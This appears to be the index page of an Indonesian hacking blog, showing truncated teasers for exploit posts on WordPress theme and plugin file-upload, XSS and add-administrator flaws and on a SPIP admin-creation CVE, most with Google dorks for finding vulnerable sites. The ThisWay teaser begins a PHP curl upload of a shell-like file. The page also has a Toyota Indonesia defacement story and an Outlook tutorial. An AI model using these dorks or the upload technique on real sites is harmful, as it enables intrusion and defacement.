Wordpress Salespresspro Theme File Upload Vulnerability

#-Title: Wordpress Salespresspro Theme File Upload Vulnerability#-Author: unknown#-Date: 18/01/2015#- Vendor : Mark Dulisse#- Link Download : sites.google.com/site/getsalespresspro20get/#-Google Dork: inurl:wp-content/themes/Salespresspro#- Tested on : Windows 7#- Fixed in v2.0==========================================================================Proof...

Read more ...

Wordpress Themes U-Design Multiple Vulnerabilty

#-Title: Wordpress Themes U-Design Multiple Vulnerabilty#-Author: Tn_Scorpion#-Date: 18/01/2015#- Vendor : Themeforest#- by : andondesign#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220#-Google Dork: inurl:wp-content/themes/u-design#- Tested on : Windows 8--------------------------------------------------------Multiple...

Read more ...

Situs Toyota Kembali Di Hack !

Sebuah Kelompok hacker kembali menyerang situs Indonesia, dan kali ini korbannya adalah situs resmi Toyota Indonesia.Ketika kami mencoba membuka situs Toyota Indonesia yang beralamat do www.toyota.astra.co.id, laman yang biasanya menampilkan index yang berisi daftar produk-produk terbaru Toyota tersebut berubah dan hanya terlihat background...

Read more ...

Bug String Pembuat Google Chrome CRASH !

Hallo Gan/Sis pasti udah pada tau dong tentang Google Chrome ? ya sebuah browser yang di kembangkan oleh Google Developer yang pada saat ini sedang naik daun *asekk .. ya popularitas Google Chrome sudah tak diragukan lagi hampir "mengalahkan" mozilla firefox. lanjut gak usah banyak cingcong, ternyata Browser secanggih Google Chrome pun masih...

Read more ...

Wordpress Plugin Wp-checkout Multiple Vulnerabilitie

#- Title : Wordpress Plugin wp-checkout XSS & Arbitrary File Upload#- Author : DevilScreaM & Gastro-dz#- Vendor : wordpress.org/extend/plugins/wordpress-checkout/ #- Date : 09/21/2015#- Category : Web Applications#- Type : PHP#- Vulnerabillity : Arbitrary File Upload, XSS#- Dork : inurl:wp-content/plugins/wp-checkout#- Tested on...

Read more ...

Tutorial Konfigurasi POP Outlook dengan Gmail

Assalamualaikum Wr. Wb.Kali ini saya akan menshare tutorial bagaimana cara menseting pop3 outlook dengan Gmail.  kamu bisa menkonfigur akun gmail kamu secara mudah dengan metode auto configure dari Mircrosoft Outllok 2007 dan Microsoft Outlook 2010. Tapi kamu perlu mensetting akun gmail untuk memperbolehkan kamu untuk mendownload email...

Read more ...

SPIP CMS - Add User Administrator

#- Exploit Title: SPIP CMS - Add User Administrator#- Author: Gregory Draperi#- Date: 04/30/2014#- Flaw finder : Unknown#- Email: Gregory.draperi@gmail.com#- Vendor Homepage: www.spip.net#- Software Link: files.spip.org/spip/archives/#- Version : SPIP < 3.0.9 / 2.1.22 / 2.0.23#- Tested on: Windows 7 - SPIP 2.2.22#- CVE : CVE-2013-2118-----------------------------------------------------------------------------Vulnerability...

Read more ...

WordPress QaEngine Theme - Add Administrator

#- Title: WordPress QaEngine Theme - Add Administrator#- Author: A. Samman#- URL : research.evex.pw/?vuln=10#- Date: 04/06/2015#- Vendor: enginethemes.com#- Download Link: enginethemes.com/themes/qaengine/#- References :#- OSVDB : 121267 #- PACKETSTORM : 131648#- WPVDB ID : 7885#- Description : QAEngine vulnerability allows...

Read more ...

WordPress ThisWay Arbitrary File Upload

#- Title: WordPress ThisWay Arbitrary File Upload#- Author: Bet0#- Date: 11/01/2013  #- Vendor: themeforest.net#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/#- Tested on : Windows 7Proof of Concept :<?php$uploadfile="3xploi7.php";$ch = curl_init("http://3xploi7.blogspot.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");curl_setopt($ch,...

Read more ...

Wordpress Plugin mailcwp v1.99 Remote file upload

#- Title : Wordpress Plugin mailcwp v1.99 Remote file upload#- Author : Larry W. Cashdollar, @_larry0#- Vendor : vCadreWorks Pty Ltd#- Download Site: wordpress.org/plugins/mailcwp/#- Tested on : ubuntu#- Date : 09/17/2015Vulnerability :2 $message_id = $_REQUEST["message_id"]; 3 $upload_dir = $_REQUEST["upload_dir"];. .8 $fileName...

Read more ...